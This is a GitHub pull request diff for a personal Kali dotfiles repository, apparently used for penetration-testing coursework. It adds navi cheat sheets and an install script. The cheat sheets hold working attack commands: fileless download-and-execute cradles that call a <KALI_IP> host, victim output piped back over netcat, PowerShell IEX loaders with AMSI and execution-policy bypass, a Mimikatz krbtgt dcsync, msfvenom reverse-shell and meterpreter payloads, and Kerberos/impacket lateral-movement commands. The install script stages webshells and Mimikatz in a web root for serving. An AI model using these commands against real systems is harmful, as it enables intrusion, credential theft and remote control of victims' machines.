[go: nahoru, domu]
Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Work #18

Open
wants to merge 93 commits into
base: main
Choose a base branch
from
Open

Work #18

Show file tree
Hide file tree
Changes from 3 commits
Commits
Show all changes
93 commits
Select commit Hold shift + click to select a range
ec6e101
initial personalised tweaks
thamyekh Jan 6, 2023
8e7c059
changed i3 repo; minor fixes
thamyekh Jan 8, 2023
342278f
moved packages into text files
thamyekh Jan 9, 2023
48993ef
changed firefox to firefox-esr
thamyekh Jan 9, 2023
9af7c3b
fixed audio; added script for vmware instance
thamyekh Jan 9, 2023
17b6ef8
start i3 on login; neovim as default editor
thamyekh Jan 9, 2023
581ea31
added todo and tools
thamyekh Jan 9, 2023
f05ef2b
tools added; refactoring
thamyekh Jan 12, 2023
3eba573
added -Pn flag
thamyekh Jan 12, 2023
1a80ebe
alacritty to terminator; added tools & cheatsheets
thamyekh Jan 20, 2023
954be1f
fixed terminator config
thamyekh Jan 31, 2023
3ee3a6b
lockscreen and ffprofile
thamyekh Feb 6, 2023
567ac9f
tun0 IP to clipboard on click; refactor i3blocks.conf
thamyekh Feb 7, 2023
2638dbc
change weather location for i3blocks
thamyekh Feb 7, 2023
aaed5fa
removed wallpapers in favour of solid color 808080
thamyekh Mar 13, 2023
0a835be
python utils and README todos
thamyekh Apr 2, 2023
ef043ff
Merge pull request #1 from thamyekh/work
thamyekh Apr 2, 2023
4757b02
added cheatsheets
thamyekh Jun 15, 2023
1b4a5c5
Merge pull request #2 from thamyekh/feature-home
thamyekh Jun 15, 2023
dce352f
minor changes
thamyekh Jun 15, 2023
82f2cf9
Merge branch 'main' into work
thamyekh Jun 15, 2023
9b598b7
Merge pull request #3 from thamyekh/work
thamyekh Jun 15, 2023
ffeaf3d
added pivoting cheatsheets
thamyekh Jun 18, 2023
f9e9c71
Merge branch 'main' into home
thamyekh Jun 18, 2023
f4134d3
Merge pull request #4 from thamyekh/home
thamyekh Jun 18, 2023
77dad87
added seatbelt cheatsheet
thamyekh Jul 3, 2023
0198b6a
Merge pull request #5 from thamyekh/work
thamyekh Jul 5, 2023
1a00a92
worked on OSEP and todos; added gedit
thamyekh Jul 5, 2023
eb55201
Merge pull request #6 from thamyekh/work
thamyekh Jul 5, 2023
98431f8
updated navi cheatsheets
thamyekh Jul 10, 2023
74af056
minor changes
thamyekh Jul 10, 2023
30c0527
updated todos
thamyekh Jul 12, 2023
743a1e7
Merge pull request #7 from thamyekh/work
thamyekh Jul 17, 2023
e9fa360
Merge branch 'main' into home
thamyekh Jul 17, 2023
04c2c1c
Merge pull request #8 from thamyekh/home
thamyekh Jul 17, 2023
32a77a5
added VM build instructions for Windows hosts
thamyekh Jul 18, 2023
931c86e
updated cheatsheets
thamyekh Jul 20, 2023
afa9a65
updated for testing
thamyekh Jul 27, 2023
e8e691f
Merge pull request #9 from thamyekh/home
thamyekh Jul 27, 2023
02ad518
Merge pull request #10 from thamyekh/home
thamyekh Jul 27, 2023
1280f18
apache opt test + cheatsheet
thamyekh Dec 5, 2023
a04716f
Merge branch 'main' into work
thamyekh Dec 5, 2023
b6eba04
Merge pull request #11 from thamyekh/work
thamyekh Dec 5, 2023
abfbd0f
cheats and tools
thamyekh Dec 6, 2023
2665368
Merge pull request #12 from thamyekh/work
thamyekh Dec 6, 2023
76010fa
refactor and fixed apache symlink
thamyekh Dec 6, 2023
9010817
Merge pull request #13 from thamyekh/work
thamyekh Dec 6, 2023
30c3ed9
removed i3 click to get tun0 ip
thamyekh Dec 7, 2023
3f0ed19
Merge pull request #14 from thamyekh/work
thamyekh Dec 7, 2023
fa087b4
minor fixes
thamyekh Dec 8, 2023
839b19b
Merge pull request #15 from thamyekh/work
thamyekh Dec 8, 2023
5bf61ae
fixed cheatsheets added adPEAS
thamyekh Dec 11, 2023
8693546
Merge pull request #16 from thamyekh/work
thamyekh Dec 11, 2023
428b54d
major fixes
thamyekh Dec 12, 2023
0be6492
Merge pull request #17 from thamyekh/work
thamyekh Dec 12, 2023
22c1f56
minor fixes
thamyekh Dec 19, 2023
a0af2a0
Merge pull request #18 from thamyekh/work
thamyekh Dec 19, 2023
c3cf8de
added conky, tidying
thamyekh Dec 21, 2023
b6c8dac
Merge pull request #19 from thamyekh/work
thamyekh Dec 21, 2023
d706a18
conky fixes, more cheats
thamyekh Jan 5, 2024
567c803
test install command
thamyekh Jan 5, 2024
1a1d573
Merge pull request #20 from thamyekh/work
thamyekh Jan 5, 2024
d5a5cf7
minor fixes
thamyekh Jan 8, 2024
da58a44
Merge pull request #21 from thamyekh/work
thamyekh Jan 8, 2024
a5e41c6
refactored cheatsheets
thamyekh Jan 9, 2024
bd1bcb7
Merge pull request #22 from thamyekh/work
thamyekh Jan 9, 2024
7773df2
refactored cheatsheets
thamyekh Jan 10, 2024
893428e
Merge pull request #23 from thamyekh/work
thamyekh Jan 10, 2024
c3a087d
minor fixes
thamyekh Jan 11, 2024
b351a0e
Merge pull request #24 from thamyekh/work
thamyekh Jan 12, 2024
799e019
minor fixes
thamyekh Feb 1, 2024
4770f34
Merge pull request #25 from thamyekh/work
thamyekh Feb 1, 2024
62fbdd6
cheatsheets
thamyekh Feb 5, 2024
9061123
updated cheatsheets
thamyekh Feb 28, 2024
78f09c1
Merge pull request #26 from thamyekh/work
thamyekh Feb 28, 2024
1c8772f
updated cheatsheets
thamyekh Mar 25, 2024
0455ea3
Merge pull request #27 from thamyekh/work
thamyekh Mar 25, 2024
5c21817
updated cheatsheets
thamyekh Mar 28, 2024
4ac6123
Merge pull request #28 from thamyekh/work
thamyekh Mar 28, 2024
048216f
updated cheatsheets
thamyekh Apr 6, 2024
bfb5e2b
updated cheatsheets
thamyekh Apr 7, 2024
70593b4
Merge pull request #29 from thamyekh/work
thamyekh Apr 7, 2024
2b2b04e
updated cheatsheets
thamyekh Apr 24, 2024
814e5ee
Merge pull request #30 from thamyekh/work
thamyekh Apr 24, 2024
5c82cd2
updated cheatsheets
Apr 25, 2024
acbede8
fixed neovim, rust install, added useful linux commands
thamyekh Apr 28, 2024
8124dd3
added images
thamyekh Apr 28, 2024
183a5ba
updated cheatsheets; added optional dnsmasq
May 30, 2024
116042d
refactored pipewire
thamyekh May 31, 2024
fae28e0
refactor crackmapexec
thamyekh Jun 6, 2024
612f21c
debloat
thamyekh Jun 11, 2024
6296ec2
fixed apt installing missing packages
thamyekh Jun 12, 2024
d490a9e
minor fixes
thamyekh Jun 13, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
20 changes: 20 additions & 0 deletions .local/share/navi/cheats/enumeration.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
% enumeration

# download + execute winPEASany from memory in PowerShell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("<OPTIONAL_PARAM>")

# fileless execution of linpeas
sudo python3 -m http.server 80
curl <KALI_IP>/linpeas.sh | sh #Victim

# fileless execution of linpeas
sudo nc -q 5 -lvnp 80 < linpeas.sh
cat < /dev/tcp/<KALI_IP>/80 | sh #Victim

# excute from memory and send output back to the host
sudo python3 -m http.server 80
nc -lvnp 9002 | tee linpeas.out
curl <KALI_IP>/linpeas.sh | sh | nc <KALI_IP> 9002 #Victim

#read linpeas output with colors
less -r linpeas.out
7 changes: 7 additions & 0 deletions .local/share/navi/cheats/impacket.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -8,3 +8,10 @@ impacket-smbserver -smb2support evil $PWD

# smbserver (password share on kali)
impacket-smbserver -smb2support -username evil -password evil evil $PWD

# raiseChild
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<ADMIN_USER>
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<ADMIN_USER>:'<PASS>'

# psexec via env KRB5CCNAME (testing needed remove dc-ip and target-ip)
impacket-psexec -k -no-pass <DOMAIN>/<ADMIN>@<ETC_HOST_FQDN> -dc-ip 192.168.178.70 -target-ip 192.168.178.70
6 changes: 6 additions & 0 deletions .local/share/navi/cheats/mimikatz.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
% mimikatz

# invoke-mimikatz single command with spaces
IEX(New-Object Net.WebClient).DownloadString("http://<KALI_IP>/win/Invoke-Mimikatz2.ps1")
; example: dcsync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<FQDN> /user<DOMAIN>:\krbtgt"'
24 changes: 24 additions & 0 deletions .local/share/navi/cheats/msfconsole.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
% msfconsole

# listener handler
msfconsole -q -x "use multi/handler; set payload <PAYLOAD>; set lhost <LHOST>; set lport <PORT>; exploit"

# meterpreter pivoting
use multi/manage/autoroute
set session <SESSION>
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j

# port scan via pivot
use auxiliary/scanner/portscan/tcp
set RHOST <TARGET_IP>

# duplicate meterpreter session start background multi/handler first
use post/windows/manage/multi_meterpreter_inject
set iplist <VICTIM_IP>
set lport 443
set payload <PAYLOAD>
set session <SESSION>
exploit
9 changes: 6 additions & 3 deletions .local/share/navi/cheats/msfvenom.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -6,10 +6,13 @@ msfvenom -p java/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war -o shell.w
# windows 64 reverse powershell
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o shell.exe

# windows 64 meterpreter https
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=443 EXITFUNC=thread -f exe -o met.exe

# linux 64 meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f elf prependfork=true -t 300 -e x64/xor_dynamic -o shellme.elf

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'

# search payloads
msfvenom --list payloads | grep linux | grep meterpreter | grep x64

# listener handler
msfconsole -q -x "use multi/handler; set payload <PAYLOAD>; set lhost <LHOST>; set lport <PORT>; exploit"
13 changes: 11 additions & 2 deletions .local/share/navi/cheats/powershell.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,4 +1,13 @@
% powershell/misc

# powershell base64 encode command string
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'mikefrobbins.com'"))
# base64 encode command string
$text = "(New-Object System.Net.WebClient).DownloadString('http://<KALI_IP>/run.txt') | IEX"
[Convert]::ToBase64String( [System.Text.Encoding]::Unicode.GetBytes($text))
powershell -enc KABOAGUA...==

# fileless import/execute (bypass amsi first)
IEX(New-Object Net.WebClient).DownloadString("http://<KALI_IP>/<PS1>")
powershell -ep bypass -command "iex(New-Object Net.WebClient).DownloadString('http://<KALI_IP>/<PS1>')"
echo IEX (New-Object Net.WebClient).DownloadString('http://<KALI_IP>/<PS1>') | powershell -NoProfile -Command -
(New-Object System.Net.WebClient).DownloadString('http://<KALI_IP>/<PS1>') | IEX
powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest 'http://<KALI_IP>/<PS1>').Content).Invoke();"
7 changes: 7 additions & 0 deletions .local/share/navi/cheats/rubeus.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
% rubeus

# running in memory
[Convert]::ToBase64String([IO.File]::ReadAllBytes("/opt/win/Rubeus.exe")) | Out-File -Encoding ASCII /opt/win/rubeus.txt
$content = (New-Object System.Net.WebClient).DownloadString('http://<KALI_IP>/win/rubeus.txt')
$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($content))
[Rubeus.Program]::Main("<RUBEUS_CMD>".Split())
4 changes: 4 additions & 0 deletions .local/share/navi/cheats/smb.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,4 +7,8 @@ smbclient -L //<RHOST> -U ''
net use z: \\\<LHOST>\evil /user:evil evil
dir Z:\

# execute files directly from smb
net use \\<LHOST>\share /user:<USER> <PASS>
\\<LHOST>\share\OSEP-Code-Snippets\<ATTACK_TYPE>\bin\x64\Release\<BIN>

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
7 changes: 7 additions & 0 deletions .local/share/navi/cheats/template.cheat
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
% start tags

# should be descriptions of commands
; are ignored. You can use them for metacomments
navi --print

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
63 changes: 33 additions & 30 deletions install.sh
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,40 +21,43 @@ betterlockscreen -u . --fx color --color 808080

# rust tools install
cargo install rustscan navi

# github tools install
sudo curl -sL https://api.github.com/repos/carlospolop/PEASS-ng/releases/latest | jq -r ".assets[].browser_download_url" | sudo tee git_peass
sudo mkdir -p /opt/peass && sudo wget -i git_peass -P /opt/peass
sudo wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1 -P /opt/peass
sudo curl -sL https://api.github.com/repos/DominicBreuker/pspy/releases/latest | jq -r ".assets[].browser_download_url" | sudo tee git_pspy
sudo mkdir -p /opt/pspy && sudo wget -i git_pspy -P /opt/pspy
sudo curl -sL https://api.github.com/repos/jpillora/chisel/releases/latest | jq -r ".assets[].browser_download_url" | grep -e 386 -e amd64 | grep -v darwin | sudo tee git_chisel
sudo mkdir -p /opt/lateral && sudo wget -i git_chisel -P /opt/lateral
sudo rm git_peass git_pspy git_chisel
sudo mkdir -p /opt/webshells
sudo git clone https://github.com/ivan-sincek/php-reverse-shell.git /opt/webshells/php-reverse-shell
sudo mkdir -p /opt/webshells/p0wny-shell
sudo wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -P /opt/webshells/p0wny-shell
sudo mkdir -p /opt/win_binaries
sudo wget https://gitlab.com/kalilinux/packages/windows-binaries/-/raw/kali/master/nc.exe -P /opt/win_binaries
sudo wget https://live.sysinternals.com/PsExec.exe -P /opt/win_binaries
sudo wget https://live.sysinternals.com/PsExec64.exe -P /opt/win_binaries
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -P /opt/win_binaries
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -P /opt/win_binaries
sudo wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.7z -P /opt/win_binaries
sudo mkdir /opt/lin_binaries
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep nmap | head -n 1)
sudo wget $(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64 | grep tar) -P /opt/lin_binaries
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep socat | head -n 1)
sudo wget $(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64) -P /opt/lin_binaries

# python tools install

pip3 install bloodhound

# ruby tools install
sudo gem install evil-winrm

# wget tools install into /opt
sudo mkdir -p /opt/lin /opt/web /opt/win
sudo curl -sL https://api.github.com/repos/jpillora/chisel/releases/latest | jq -r ".assets[].browser_download_url" | grep -e 386 -e amd64 | grep -v darwin | sudo tee /tmp/git_download
sudo curl -sL https://api.github.com/repos/projectdiscovery/naabu/releases/latest | jq -r ".assets[].browser_download_url" | grep -e 386 -e amd64 | sudo tee -a /tmp/git_download
sudo cat /tmp/git_download | grep linux | sudo tee /tmp/git_download_lin
sudo cat /tmp/git_download | grep windows | sudo tee /tmp/git_download_win
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep nmap | head -n 1)
sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64 | grep tar | sudo tee -a /tmp/git_download_lin
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep socat | head -n 1)
sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64 | sudo tee -a /tmp/git_download_lin
sudo wget -i /tmp/git_chisel_lin -P /opt/lin
sudo wget -i /tmp/git_chisel_win -P /opt/win
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -P /opt/lin
sudo curl -sL https://api.github.com/repos/DominicBreuker/pspy/releases/latest | jq -r ".assets[].browser_download_url" | sudo tee /tmp/git_pspy
sudo mkdir -p /opt/lin/pspy && sudo wget -i /tmp/git_pspy -P /opt/lin/pspy
sudo git clone https://github.com/ivan-sincek/php-reverse-shell.git /opt/web/php-reverse-shell
sudo wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -P /opt/web/p0wny-shell
sudo wget https://raw.githubusercontent.com/z3mms/HostRecon/master/HostRecon.ps1 -P /opt/win
sudo wget https://raw.githubusercontent.com/thamyekh/OSEP-Code-Snippets/main/active_directory/Invoke-Mimikatz2.ps1 -P /opt/win
sudo wget https://gitlab.com/kalilinux/packages/windows-binaries/-/raw/kali/master/nc.exe -P /opt/win
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -P /opt/win
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -P /opt/win
sudo wget https://live.sysinternals.com/PsExec.exe -P /opt/win
sudo wget https://live.sysinternals.com/PsExec64.exe -P /opt/win
sudo wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_Any/Rubeus.exe -P /opt/win
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe -P /opt/win
sudo ln -s /opt/lin /var/www/html/lin
sudo ln -s /opt/web /var/www/html/web
sudo ln -s /opt/win /var/www/html/win
# TODO: remove this line after checking nabuu linwinpeas chisel p0wnyshell php nmap socat rubeus are installed


# nerdfonts install/reboot
mkdir -p ~/.local/share/fonts/
sudo curl -sL https://api.github.com/repos/ryanoasis/nerd-fonts/releases/latest | jq -r ".assets[] | select(.name | test(\"Iosevka\")) | .browser_download_url" > iosevka
Expand All @@ -73,4 +76,4 @@ fc-cache -fv
sudo apt -y install pipewire-pulse wireplumber pipewire-media-session-
systemctl --user --now enable wireplumber.service

echo "Done! Please reboot: Select i3 on login, run lxappearance and select arc-dark, you can also delete this repo."
echo "Done! After reboot run lxappearance and select arc-dark, you can also delete this repo."